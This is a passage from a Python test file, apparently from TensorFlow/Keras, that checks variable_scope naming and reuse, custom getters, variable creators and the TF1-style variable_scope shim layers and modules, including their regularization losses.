tf.compat.v1.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with tf.compat.v1.variable_scope("default") as default:
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/layer/w:0")
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_1/w:0")
with tf.compat.v1.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True) as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with tf.compat.v1.variable_scope("root"):
with tf.compat.v1.variable_scope("towerA") as tower_a:
va = tf.compat.v1.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("towerB"):
vb = tf.compat.v1.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with tf.compat.v1.variable_scope("towerA", reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va3 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va, va3)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [1], dtype=tf.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer) as outer:
with tf.compat.v1.variable_scope("tower", "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with tf.compat.v1.variable_scope(None, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "scope/w:0")
with tf.compat.v1.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "scope/w1:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
None, default_name="default", auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = tf.compat.v1.get_variable_scope()
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False):
self.assertEqual(tf.compat.v1.get_variable("w", []).name, "w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(tf.compat.v1.get_variable("w1", []).name, "w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with tf.compat.v1.variable_scope("scope") as scope:
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope("inner") as inner:
pass
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with tf.name_scope(scope.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope("another"):
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with tf.name_scope(scope1.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name,
"outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = tf.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with tf.compat.v1.device(device_func):
_ = tf.compat.v1.get_variable("x", (100, 200))
_ = tf.compat.v1.get_variable(
"y", dtype=tf.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", tf.float32))
self.assertEqual(varname_type[1], ("y", tf.int64))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = tf.compat.v1.get_variable("v", shape=[3, 4], dtype=tf.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = tf.compat.v1.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesNoArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesOptionalArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda x=True: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = tf.Graph()
g2 = tf.Graph()
with g1.as_default():
with g2.as_default():
with tf.compat.v1.variable_scope("_"):
pass
self.assertRaisesRegex(ValueError,
"'_' is not a valid (?:root )?scope name", f)
class VariableScopeWithCustomGetterTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
with tf.compat.v1.variable_scope("scope0", custom_getter=3):
tf.compat.v1.get_variable("name0")
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
tf.compat.v1.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope(scope, reuse=True):
v2 = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("new_scope") as new_scope:
v3 = tf.compat.v1.get_variable("v3", [1])
with tf.compat.v1.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = tf.compat.v1.get_variable("v3", [1])
self.assertIs(v, v2)
self.assertIs(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = tf.VariableSynchronization.AUTO
aggregation = tf.compat.v1.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
tf.compat.v1.get_variable("v", [1])
self.assertEqual(1, called[0])
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
synchronization = tf.VariableSynchronization.ON_READ
aggregation = tf.compat.v1.VariableAggregation.MEAN
tf.compat.v1.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with tf.variable_creator_scope(creator_a):
with tf.variable_creator_scope(creator_b):
tf.compat.v1.Variable(1.0, name="one_name")
self.assertEqual(variable_names[0], "forced_name")
called = [False]
def creater_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
tf.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
tf.compat.v1.VariableAggregation.MEAN)
return next_creator(**kwargs)
with tf.variable_creator_scope(creater_c):
tf.compat.v1.get_variable(
"v", [],
synchronization=tf.VariableSynchronization.ON_WRITE,
aggregation=tf.compat.v1.VariableAggregation.MEAN)
self.assertTrue(called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreatorNestingError(self):
def creator(next_creator, **kwargs):
return next_creator(**kwargs)
# Save the state so we can clean up at the end.
graph = tf.compat.v1.get_default_graph()
old_creator_stack = graph._variable_creator_stack
try:
scope = tf.variable_creator_scope(creator)
scope.__enter__()
with tf.variable_creator_scope(creator):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
finally:
graph._variable_creator_stack = old_creator_stack
class VariableScopeMultithreadedTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with tf.compat.v1.variable_scope(main_thread_scope):
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("bar/v:0", v.name)
graph = tf.compat.v1.get_default_graph()
with tf.compat.v1.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
class CompatV1TemplateScaleByY(variable_scope_shim.VariableScopeLayer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def my_op(x, scalar_name):
var1 = tf.compat.v1.get_variable(
scalar_name,
shape=[],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.constant_initializer(1.5))
return x * var1
self.scale_by_y = tf.compat.v1.make_template(
"scale_by_y", my_op, scalar_name="y")
def forward_pass(self, inputs):
with tf.compat.v1.variable_scope("foo"):
return self.scale_by_y(inputs)
class VariableScopeModule(tf.Module):
"""Module that uses the shim."""
@variable_scope_shim.track_tf1_style_variables
def __call__(self, *args, **kwargs):
with self.name_scope:
return self.forward_pass(*args, **kwargs)
def get_compat_v1_regularization_losses(self):
"""Dict w/ regularization losses from `get_variable`&`compat.v1.layers`."""
return {name: regularizer() for name, regularizer
in self._tf1_style_var_store._regularizers.items()} # pylint: disable=protected-access
@combinations.generate(combinations.combine(mode=["eager"]))
class TF1VariableScopeLayerTest(tf.test.TestCase, parameterized.TestCase):
def test_get_variable(self):
# Test the shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_compat_v1_layer(self):
# Test the shim when using `compat.v1` layers
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_shim_exporting(self):
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs,
self.units,
name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out,
self.units,
name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
layer(tf.ones(shape=(5, 5)))
tmp_dir = self.get_temp_dir()
tf.saved_model.save(layer, tmp_dir)
def test_variable_store_scope_get_variable(self):
# Test the module shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(tf.Module):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
self._variable_store = variable_scope_shim._EagerVariableStore()
def get_compat_v1_regularization_losses(self):
"""Dict w/ regularization losses from `get_variable`."""
return {name: regularizer() for name, regularizer
in self._variable_store._regularizers.items()} # pylint: disable=protected-access
def __call__(self, inputs, training=None):
with self._variable_store.scope():
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 6)
def test_module_get_variable(self):
# Test the module shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 6)
def test_module_compat_v1_layer(self):
# Test the module shim when using `compat.v1` layers
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 6)
def test_shim_nesting(self):
# Test that nesting the shim in itself works
class NestedLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, name, *args, **kwargs):
super().__init__(*args, name=name, **kwargs)
self.units = units
def forward_pass(self, inputs):
out = inputs
with tf.compat.v1.variable_scope(self.name):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(1.0),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.initializers.zeros,
name="bias")
out = tf.linalg.matmul(out, kernel)
out = tf.compat.v1.nn.bias_add(out, bias)
return out
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self.dense_layer_a = None
self.dense_layer_b = None
def forward_pass(self, inputs):
# Only create the nested tf.variable/module/layer/model if it has not
# already been created!
if not self.dense_layer_a:
self.dense_layer_a = NestedLayer(self.units * 2, "dense_one")
out = self.dense_layer_a(inputs)
if not self.dense_layer_b:
self.dense_layer_b = NestedLayer(self.units, "dense_two")
out = self.dense_layer_b(out)
return out
layer = WrappedDenseLayer(5)
out = layer(tf.ones(shape=(1, 3)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
# (Specifically: no double-counting of any weights or reg. losses
# between nested components!)
self.assertEqual({var.name for var in layer.trainable_weights},
{"dense_one/bias:0",
"dense_one/kernel:0",
"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_a.weights},
{"dense_one/bias:0",
"dense_one/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_b.weights},
{"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_a.losses), 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_b.losses), 50)
self.assertAllEqual(tf.add_n(layer.losses), 80)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(3, 10)) * 2)
weights["dense_two/kernel:0"].assign(
tf.ones(shape=(10, 5)) * 2)
out = layer(tf.ones(shape=(1, 3)))
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 120)
self.assertAllEqual(tf.add_n(layer.losses), 320)
def test_compat_v1_make_template_in_shim_eager(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in eager
layer = CompatV1TemplateScaleByY()
for _ in range(3):
# Use multiple calls to verify that no new weights get created
self.assertAllEqual(layer(tf.ones(shape=(2, 3))),
tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual({var.name: var.numpy() for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
self.assertAllEqual(tf.add_n(layer.losses),
regularizers.L2()(layer.weights[0]))
